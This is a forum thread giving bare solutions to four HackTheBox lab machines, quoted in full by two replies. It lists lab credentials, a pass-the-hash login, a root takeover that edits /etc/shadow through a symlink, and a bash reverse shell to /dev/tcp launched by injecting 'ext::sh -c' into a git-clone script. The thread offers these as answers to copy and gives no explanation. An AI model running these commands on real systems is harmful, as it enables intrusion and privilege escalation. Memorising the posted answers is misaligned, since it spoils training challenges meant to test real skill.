[Free] Cicada / Greenhorn / Permx / Editorial - Solutions
by fuckedupindacrib - Saturday October 12, 2024 at 06:38 AM
#1
Cicada:

User:
evil-winrm -i 10.10.XX.XX -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt'

Root:
impacket-wmiexec Administrator@10.10.XX.XX -hashes :2b87e7c93a3e8a0ea4a581937016f341

Greenhorn:

User: get from root

Root:
ssh root@10.10.XX.XX
Pass: sidefromsidetheothersidesidefromsidetheotherside

Permx:

User:
ssh mtz@10.10.XX.XX
Pass: 03F6lY3uXAP2bkW8


Root: (in user shell):
ln -s /etc/shadow ~/pwn
sudo /opt/acl.sh mtz rwx /home/mtz/pwn
sudo nano ~/pwn #remove the password hash for root, save file/close
su root

Editorial:

User:
ssh dev@10.10.XX.XX
Pass: dev080217_devAPI!@


Root
ssh prod@10.10.XX.XX
Pass: 080217_Producti0n_2023!@

echo "/bin/bash -i >& /dev/tcp/10.10.XX.XX/PORT 0>&1" > /tmp/shell
sudo /usr/bin/python3 /opt/internal_apps/clone_changes/clone_prod_change.py 'ext::sh -c bash% /tmp/shell'
Reply
#2
(Oct 12, 2024, 06:38 AM)fuckedupindacrib Wrote: Cicada:

User:
evil-winrm -i 10.10.XX.XX -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt'

Root:
impacket-wmiexec Administrator@10.10.XX.XX -hashes :2b87e7c93a3e8a0ea4a581937016f341

Greenhorn:

User: get from root

Root:
ssh root@10.10.XX.XX
Pass: sidefromsidetheothersidesidefromsidetheotherside

Permx:

User:
ssh mtz@10.10.XX.XX
Pass: 03F6lY3uXAP2bkW8


Root: (in user shell):
ln -s /etc/shadow ~/pwn
sudo /opt/acl.sh mtz rwx /home/mtz/pwn
sudo nano ~/pwn #remove the password hash for root, save file/close
su root

Editorial:

User:
ssh dev@10.10.XX.XX
Pass: dev080217_devAPI!@


Root
ssh prod@10.10.XX.XX
Pass: 080217_Producti0n_2023!@

echo "/bin/bash -i >& /dev/tcp/10.10.XX.XX/PORT 0>&1" > /tmp/shell
sudo /usr/bin/python3 /opt/internal_apps/clone_changes/clone_prod_change.py 'ext::sh -c bash% /tmp/shell'

Thanks for sharing this for free!

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching.
Reply
#3
(Oct 12, 2024, 06:38 AM)fuckedupindacrib Wrote: Cicada:

User:
evil-winrm -i 10.10.XX.XX -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt'

Root:
impacket-wmiexec Administrator@10.10.XX.XX -hashes :2b87e7c93a3e8a0ea4a581937016f341

Greenhorn:

User: get from root

Root:
ssh root@10.10.XX.XX
Pass: sidefromsidetheothersidesidefromsidetheotherside

Permx:

User:
ssh mtz@10.10.XX.XX
Pass: 03F6lY3uXAP2bkW8


Root: (in user shell):
ln -s /etc/shadow ~/pwn
sudo /opt/acl.sh mtz rwx /home/mtz/pwn
sudo nano ~/pwn #remove the password hash for root, save file/close
su root

Editorial:

User:
ssh dev@10.10.XX.XX
Pass: dev080217_devAPI!@


Root
ssh prod@10.10.XX.XX
Pass: 080217_Producti0n_2023!@

echo "/bin/bash -i >& /dev/tcp/10.10.XX.XX/PORT 0>&1" > /tmp/shell
sudo /usr/bin/python3 /opt/internal_apps/clone_changes/clone_prod_change.py 'ext::sh -c bash% /tmp/shell'

Thanks for sharing this for free!Thanks for sharing this for free!

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Replying With Hidden Content
Reply
#4
thanks bro help me a lot
Reply
#5
sure but why not give more details Smile

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching | http://c66go4clkqodr7tdjfu76jztjs7w7d3fajdeypxn73v4ju3dt7g5yyyd.onion/Forum-Ban-Appeals if you feel this is incorrect.
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  [FREE] HackTheBox Academy - CBBH CDSA CPTS All Modules Flags Techtom 49 3,889 3 hours ago
Last Post: opium0221
  [FREE] CPTS 12 FLAGS pulsebreaker 87 3,345 9 hours ago
Last Post: darth_sidious
  [MEGALEAK] HackTheBox ProLabs, Fortress, Endgame - Alchemy, 250 Flags, leak htb-bot htb-bot 98 9,197 Yesterday, 08:05 PM
Last Post: Zacker90
  SVCHOST Injector 2026 opsecmaster67 0 111 Yesterday, 01:41 PM
Last Post: opsecmaster67
  Cold Seal 5.6 cracked Sensitive information can be exposed or stolen opsecmaster67 0 96 Yesterday, 01:38 PM
Last Post: opsecmaster67

Forum Jump:


 Users browsing this forum: 1 Guest(s)